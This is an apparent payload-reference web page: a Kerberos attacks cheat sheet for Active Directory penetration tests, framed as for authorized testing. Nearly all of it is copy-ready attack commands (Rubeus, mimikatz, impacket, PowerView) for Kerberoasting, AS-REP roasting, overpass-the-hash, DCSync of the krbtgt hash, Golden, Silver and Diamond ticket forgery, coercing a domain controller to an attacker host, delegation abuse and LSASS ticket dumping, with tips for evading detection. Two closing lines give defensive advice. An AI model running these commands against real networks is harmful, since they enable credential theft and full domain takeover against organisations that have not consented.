Kerberos Attacks Cheat Sheet

Kerberos attack techniques for Active Directory pentests — Kerberoasting, AS-REP roasting, Golden and Silver Tickets, delegation abuse (unconstrained, constrained, RBCD), and overpass-the-hash. (52 payloads)

Try it interactively with the Hash Generator

SPN Discovery & Enumeration

(8)

setspn -T domain.com -Q */*

Native Windows: enumerate all SPNs registered in the domainNo special privileges — any domain user can query SPNs

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select Name,ServicePrincipalName

PowerShell: find user accounts with an SPN (Kerberoastable targets)User-account SPNs matter — machine accounts have 120-char random passwords

Get-DomainUser -SPN | Select samaccountname,serviceprincipalname

PowerView: list Kerberoastable accounts via LDAPPowerView function — no Rubeus/binary needed

python3 GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP>

impacket: list SPNs remotely without requesting tickets yetDrop -request to enumerate only; recon before noisy roasting

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

PowerShell: find accounts with Kerberos pre-auth disabled (AS-REP roastable)UAC flag 0x400000 / DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired -Verbose | Select samaccountname

PowerView: enumerate AS-REP roastable usersTargets the userAccountControl pre-auth bit

Get-DomainComputer -Unconstrained | Select dnshostname

PowerView: find computers configured for unconstrained delegationTRUSTED_FOR_DELEGATION (UAC 0x80000) — high-value delegation targets

Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto

PowerView: find constrained-delegation principals and their allowed targetsmsDS-AllowedToDelegateTo populated = constrained delegation

Kerberoasting (TGS-REP)

(8)

python3 GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP> -request -outputfile kerb.hashes

impacket: request TGS-REP for every SPN account and save crackable hashesService ticket is RC4/AES encrypted with the service account's password hash

GetUserSPNs.py domain.com/user:password -request-user svc_sql -outputfile svc_sql.hash

impacket: targeted roast of a single account to stay quietAvoids requesting every SPN at once (less Event ID 4769 noise)

Rubeus.exe kerberoast /outfile:hashes.txt /nowrap

Rubeus: Kerberoast all SPN accounts from a domain-joined host/nowrap keeps the hash on one line for hashcat

Rubeus.exe kerberoast /user:svc_sql /domain:domain.com /nowrap

Rubeus: targeted single-user KerberoastQuieter than roasting the whole domain

Rubeus.exe kerberoast /rc4opsec /tgtdeleg /nowrap

Rubeus: only roast accounts where RC4 is allowed (downgrade for crackability)AES-encrypted tickets (mode 19700) crack far slower than RC4 (13100)

Rubeus.exe kerberoast /stats

Rubeus: enumerate roastable accounts and their supported etypes without requesting ticketsRecon — see which accounts still allow RC4 before roasting

hashcat -m 13100 -a 0 hashes.txt rockyou.txt

Crack RC4 (etype 23) TGS-REP hashes offline$krb5tgs$23$ prefix = RC4

hashcat -m 19700 -a 0 hashes.txt rockyou.txt

Crack AES256 (etype 18) TGS-REP hashes — use 19600 for AES128 (etype 17)$krb5tgs$18$ = AES256, $krb5tgs$17$ = AES128

AS-REP Roasting

(6)

python3 GetNPUsers.py domain.com/ -dc-ip <DC_IP> -usersfile users.txt -no-pass -format hashcat -outputfile asrep.hashes

impacket: request AS-REP for accounts with pre-auth disabled (unauthenticated)No credentials needed — only a username list (DONT_REQ_PREAUTH accounts)

GetNPUsers.py domain.com/user:password -request -format hashcat -outputfile asrep.hashes

impacket: authenticated AS-REP roast — auto-enumerate vulnerable accounts via LDAPWith valid creds, finds DONT_REQ_PREAUTH accounts itself

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt /nowrap

Rubeus: AS-REP roast all pre-auth-disabled accounts from a domain host/format:hashcat outputs the $krb5asrep$ hash directly

Rubeus.exe asreproast /user:jsmith /format:hashcat /nowrap

Rubeus: targeted AS-REP roast of a single accountQuieter; single Event ID 4768 for AS-REQ

hashcat -m 18200 -a 0 asrep.hashes rockyou.txt

Crack AS-REP (RC4) hashes offline$krb5asrep$23$ prefix

Set-DomainObject -Identity jsmith -XOR @{useraccountcontrol=4194304} -Verbose

PowerView: targeted AS-REP roast — flip DONT_REQ_PREAUTH on a user you can write toRequires GenericWrite/GenericAll over the target; remember to revert

Overpass-the-Hash / Pass-the-Key

(6)

Rubeus.exe asktgt /user:Administrator /rc4:<NTLM_HASH> /domain:domain.com /ptt

Overpass-the-hash: turn an NTLM hash into a Kerberos TGT and inject itUses RC4 etype — encrypts the AS-REQ timestamp with the NT hash

Rubeus.exe asktgt /user:Administrator /aes256:<AES256_KEY> /domain:domain.com /ptt /opsec

Pass-the-key with AES256 — avoids RC4 etype downgrade detectionGet AES keys from mimikatz sekurlsa::ekeys; /opsec mimics normal client behaviour

python3 getTGT.py domain.com/Administrator -hashes :<NTLM_HASH> -dc-ip <DC_IP>

impacket: request a TGT from an NTLM hash, saved to a .ccache fileLinux equivalent of overpass-the-hash

python3 getTGT.py domain.com/Administrator -aesKey <AES256_KEY> -dc-ip <DC_IP>

impacket: request a TGT using the AES256 Kerberos keyPass-the-key — RC4-less, stealthier

export KRB5CCNAME=Administrator.ccache

Set the ccache so impacket/native tools use the new TGTThen run psexec.py -k -no-pass domain.com/Administrator@target

mimikatz # sekurlsa::pth /user:Administrator /domain:domain.com /aes256:<KEY> /run:powershell.exe

mimikatz overpass-the-hash: spawn a process with injected Kerberos keysPrefer /aes256 over /ntlm to keep tickets AES-encrypted

Golden & Silver Tickets

(8)

mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt

Get the krbtgt account hash via DCSync — the seed for any Golden TicketRequires Domain Admin / replication rights

mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:<NTLM> /id:500 /ptt

Forge and inject a Golden Ticket (a TGT signed with the krbtgt key)Use /aes256:<key> instead of /krbtgt for AES; default lifetime is 10 years

Rubeus.exe golden /aes256:<KRBTGT_AES> /user:Administrator /id:500 /domain:domain.com /sid:S-1-5-21-... /ptt

Rubeus: forge a Golden Ticket using the krbtgt AES256 key (stealthier than RC4)RC4 Golden Tickets trigger encryption-downgrade detections

python3 ticketer.py -nthash <KRBTGT_NTLM> -domain-sid S-1-5-21-... -domain domain.com Administrator

impacket: forge a Golden Ticket to a .ccache fileAdd -aesKey for AES; load with KRB5CCNAME=Administrator.ccache

mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:<SID> /target:srv.domain.com /service:cifs /rc4:<MACHINE_NTLM> /ptt

Forge a Silver Ticket — a TGS signed with a service account / machine hashSilver = service-scoped, no DC contact, far harder to detect than Golden

python3 ticketer.py -nthash <MACHINE_NTLM> -domain-sid <SID> -domain domain.com -spn cifs/srv.domain.com Administrator

impacket: forge a Silver Ticket for a specific SPNMachine hash grants cifs/host/etc. on that single server

Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /krbkey:<KRBTGT_AES> /ptt

Diamond Ticket: modify a real TGT instead of forging from scratch (evades anomaly detection)More legitimate-looking than a Golden Ticket — uses a genuine AS-REQ

Rubeus.exe golden /sapphire ... /user:lowpriv /service:krbtgt ...

Sapphire Ticket: forge with a real high-priv user's PAC via S4U2self/U2UEmbeds an authentic privileged PAC — defeats PAC validation checks

Delegation Abuse

(8)

Rubeus.exe monitor /interval:5 /nowrap

Unconstrained delegation: harvest TGTs of any user/computer that authenticates to the compromised hostOn an unconstrained host, inbound TGTs land in LSASS — capture and reuse them

SpoolSample.exe DC$ ATTACKER_UNCONSTRAINED_HOST

Coerce a DC to authenticate to your unconstrained host (printer bug / MS-RPRN)Combine with Rubeus monitor to capture the DC's TGT, then DCSync

python3 getST.py -spn cifs/target.domain.com -impersonate Administrator -dc-ip <DC_IP> domain.com/svc_account:password

Constrained delegation: abuse S4U2self+S4U2proxy to impersonate any user to an allowed SPNAccount has msDS-AllowedToDelegateTo set; the SPN service part can be swapped

Rubeus.exe s4u /user:svc_web /rc4:<HASH> /impersonateuser:Administrator /msdsspn:cifs/target.domain.com /altservice:host,ldap /ptt

Rubeus S4U: impersonate Administrator and pivot the SPN to other services/altservice exploits the unenforced service-class field to reach ldap/host/etc.

Set-DomainComputer -Identity TARGET$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Resource-Based Constrained Delegation (RBCD): write attacker-controlled SD onto a victim computerNeeds GenericWrite/GenericAll over TARGET$; classic MachineAccountQuota abuse

python3 rbcd.py -delegate-from FAKE01$ -delegate-to TARGET$ -action write domain.com/user:password

impacket: configure RBCD by writing msDS-AllowedToActOnBehalfOfOtherIdentityCreate FAKE01$ first via addcomputer.py (MAQ default = 10)

python3 getST.py -spn cifs/TARGET.domain.com -impersonate Administrator domain.com/FAKE01$:password

RBCD final step: request an impersonation TGS as Administrator to the victimFAKE01$ now trusted to delegate to TARGET$ — full takeover of that host

python3 addcomputer.py -computer-name 'FAKE01$' -computer-pass 'Pass123' domain.com/user:password

Create a computer account to use as the delegation source (MachineAccountQuota)Default ms-DS-MachineAccountQuota lets any domain user add 10 computers

Ticket Handling & Opsec

(8)

Rubeus.exe ptt /ticket:<base64_or_kirbi>

Inject a captured/forged ticket into the current logon sessionPass-the-Ticket — works for TGT or TGS

Rubeus.exe dump /service:krbtgt /nowrap

Dump Kerberos tickets from LSASS (filter to TGTs)Requires elevation; export with /service or /luid filters

Rubeus.exe triage

List all tickets across all logon sessions in a compact tableRecon — spot delegatable TGTs and high-value sessions

python3 ticketConverter.py ticket.kirbi ticket.ccache

Convert between Windows .kirbi and Linux .ccache ticket formatsMove tickets between Rubeus (Windows) and impacket (Linux) workflows

klist / kerberos::list (mimikatz) / klist (Linux)

List cached Kerberos tickets to confirm injection workedVerify a PtT/OPtH before launching follow-on tooling

Rubeus.exe asktgt /user:u /aes256:<KEY> /opsec /nopreauth ...

Use AES + /opsec flags so AS-REQ etypes match a normal Windows clientRC4-only requests stand out; AES blends with legitimate traffic

kgtgt rotation: reset krbtgt twice (with replication between resets)

Defensive: rotate krbtgt twice to invalidate forged Golden TicketsSingle reset keeps the old key valid (N-1) — two resets are required

Monitor Event ID 4769 (TGS request) with RC4 etype 0x17 from non-standard accounts

Defensive: RC4 service-ticket requests are a strong Kerberoasting signalEnforce AES-only and use long (25+ char) gMSA service-account passwords

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Windows Privilege Escalation Cheat Sheet Active Directory & Kerberos Cheat Sheet Hashcat Password Cracking Cheatsheet Mimikatz Credential Dumping Cheatsheet

Frequently asked questions

What is the Kerberos Attacks Cheat Sheet?+

It's a quick-reference collection of 52 Kerberos payloads for testing Kerberos Attacks vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Kerberos payloads?+

Copy any payload straight into your authorized test, or use the Hash Generator to apply them interactively. Only test systems you have explicit permission to assess.

Are these Kerberos payloads free to use?+

Yes — this cheat sheet and all Kerberos payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Kerberos Attacks Cheat Sheet?+

How do I use these Kerberos payloads?+

Copy any payload straight into your authorized test, or use the Hash Generator to apply them interactively. Only test systems you have explicit permission to assess.

Are these Kerberos payloads free to use?+

Yes — this cheat sheet and all Kerberos payloads are completely free, with no account required. Everything runs in your browser.

Kerberos Attacks Cheat Sheet

SPN Discovery & Enumeration

Kerberoasting (TGS-REP)

AS-REP Roasting

Overpass-the-Hash / Pass-the-Key

Golden & Silver Tickets

Delegation Abuse

Ticket Handling & Opsec

Related Tools

Related Cheat Sheets

Frequently asked questions

Kerberos Attacks Cheat Sheet

SPN Discovery & Enumeration

Kerberoasting (TGS-REP)

AS-REP Roasting

Overpass-the-Hash / Pass-the-Key

Golden & Silver Tickets

Delegation Abuse

Ticket Handling & Opsec

Related Tools

Related Cheat Sheets

Frequently asked questions